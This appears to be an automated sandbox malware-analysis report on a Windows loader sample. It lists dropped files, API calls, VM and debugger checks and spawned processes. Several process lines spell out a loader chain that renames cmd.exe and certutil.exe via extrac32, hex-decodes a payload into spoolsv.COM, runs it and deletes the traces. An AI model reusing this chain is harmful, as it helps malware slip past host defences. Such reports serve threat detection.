Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe			Jump to dropped file

Source: C:\Users\Public\Libraries\spoolsv.COM

Code function: 9_2_0296A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

9_2_0296A95C

Source: C:\Users\Public\Libraries\spoolsv.COM	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\Public\Libraries\spoolsv.COM	Memory allocated: 2950000 memory commit 500006912	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Memory allocated: 2951000 memory commit 500178944	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Memory allocated: 297C000 memory commit 500002816	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Memory allocated: 297D000 memory commit 500199424	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Memory allocated: 29AE000 memory commit 501014528	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Memory allocated: 2AA6000 memory commit 500006912	Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Memory allocated: 2AA8000 memory commit 500015104	Jump to behavior

Source: C:\Users\Public\alpha.exe	API coverage: 8.3 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.4 %
Source: C:\Users\Public\kn.exe	API coverage: 0.8 %
Source: C:\Users\Public\alpha.exe	API coverage: 9.6 %

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF6BF3E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	3_2_00007FF6BF3E823C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF6BF3E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	3_2_00007FF6BF3E2978
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF6BF3F7B4C FindFirstFileW,FindNextFileW,FindClose,	3_2_00007FF6BF3F7B4C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF6BF3D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	3_2_00007FF6BF3D1560
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF6BF3D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	3_2_00007FF6BF3D35B8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF6BF3E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	5_2_00007FF6BF3E823C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF6BF3E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	5_2_00007FF6BF3E2978
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF6BF3F7B4C FindFirstFileW,FindNextFileW,FindClose,	5_2_00007FF6BF3F7B4C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF6BF3D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	5_2_00007FF6BF3D1560
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF6BF3D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	5_2_00007FF6BF3D35B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F7123674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,	6_2_00007FF7F7123674
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F70AD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7F70AD440
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F70ED4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,	6_2_00007FF7F70ED4A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F70EB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,	6_2_00007FF7F70EB3D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F70E5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,	6_2_00007FF7F70E5E58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F70EDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,	6_2_00007FF7F70EDBC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F7141B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,	6_2_00007FF7F7141B04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F71419F8 #359,FindFirstFileW,FindNextFileW,FindClose,	6_2_00007FF7F71419F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F70DC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,	6_2_00007FF7F70DC6F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F714234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,	6_2_00007FF7F714234C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F71410C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF7F71410C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F7143100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF7F7143100
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F7146F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,	6_2_00007FF7F7146F80
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: 9_2_029558B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	9_2_029558B4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF6BF3E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	10_2_00007FF6BF3E823C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF6BF3E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	10_2_00007FF6BF3E2978
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF6BF3F7B4C FindFirstFileW,FindNextFileW,FindClose,	10_2_00007FF6BF3F7B4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF6BF3D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	10_2_00007FF6BF3D1560
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF6BF3D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	10_2_00007FF6BF3D35B8

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF7F712511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,

6_2_00007FF7F712511C

Source: Amcache.hve.17.dr	Binary or memory string: VMware
Source: Amcache.hve.17.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.17.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.17.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.17.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.17.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.17.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.17.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: spoolsv.COM, 00000009.00000002.2463208241.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000002.2463208241.000000000053F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.17.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.17.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.17.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.17.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.17.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.17.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.17.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.17.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.17.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.17.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.17.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.17.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.17.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.17.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.17.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.17.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.17.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.17.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.17.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.17.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.17.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\Public\Libraries\spoolsv.COM

API call chain: ExitProcess graph end node

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\Public\Libraries\spoolsv.COM

Code function: 9_2_0296EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

9_2_0296EBF0

Source: C:\Users\Public\Libraries\spoolsv.COM	Process queried: DebugPort			Jump to behavior
Source: C:\Users\Public\Libraries\spoolsv.COM	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF6BF3F63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

3_2_00007FF6BF3F63FC

Source: C:\Users\Public\Libraries\spoolsv.COM

Code function: 9_2_029687A0 LoadLibraryW,GetProcAddress,FreeLibrary,

9_2_029687A0

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF6BF3E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,

3_2_00007FF6BF3E823C

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF6BF3E8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FF6BF3E8FA4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF6BF3E93B0 SetUnhandledExceptionFilter,	3_2_00007FF6BF3E93B0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF6BF3E8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF6BF3E8FA4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF6BF3E93B0 SetUnhandledExceptionFilter,	5_2_00007FF6BF3E93B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F71753E0 SetUnhandledExceptionFilter,	6_2_00007FF7F71753E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F7174E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF7F7174E18
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF6BF3E8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FF6BF3E8FA4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF6BF3E93B0 SetUnhandledExceptionFilter,	10_2_00007FF6BF3E93B0

HIPS / PFW / Operating System Protection Evasion

Drops or copies certutil.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\kn.exe

Jump to dropped file

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe

Jump to dropped file

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF7F7127024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,

6_2_00007FF7F7127024

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Svcrhpjadgyclc.cmd" "C:\\Users\\Public\\spoolsv.MPEG" 9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\spoolsv.COM C:\Users\Public\Libraries\spoolsv.COM	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Svcrhpjadgyclc.cmd" "C:\\Users\\Public\\spoolsv.MPEG" 9	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12	Jump to behavior

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF7F71572B0 CAFindByName,#359,LocalAlloc,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,GetSecurityDescriptorLength,LocalAlloc,MakeSelfRelativeSD,GetLastError,CASetCASecurity,CAUpdateCAEx,#357,LocalFree,LocalFree,LocalFree,CACloseCA,

6_2_00007FF7F71572B0

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF7F7114E88 DsRoleGetPrimaryDomainInformation,#357,AllocateAndInitializeSid,GetLastError,#357,AllocateAndInitializeSid,GetLastError,#357,#357,DsRoleFreeMemory,LocalFree,#357,LocalFree,LocalFree,LocalFree,

6_2_00007FF7F7114E88

Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	3_2_00007FF6BF3E51EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	3_2_00007FF6BF3D6EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	3_2_00007FF6BF3E3140
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	5_2_00007FF6BF3E51EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	5_2_00007FF6BF3D6EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	5_2_00007FF6BF3E3140
Source: C:\Users\Public\kn.exe	Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,	6_2_00007FF7F7173800
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	9_2_02955A78
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: GetLocaleInfoA,	9_2_0295A798
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: GetLocaleInfoA,	9_2_0295A74C
Source: C:\Users\Public\Libraries\spoolsv.COM	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	9_2_02955B84
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	10_2_00007FF6BF3E51EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	10_2_00007FF6BF3D6EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	10_2_00007FF6BF3E3140

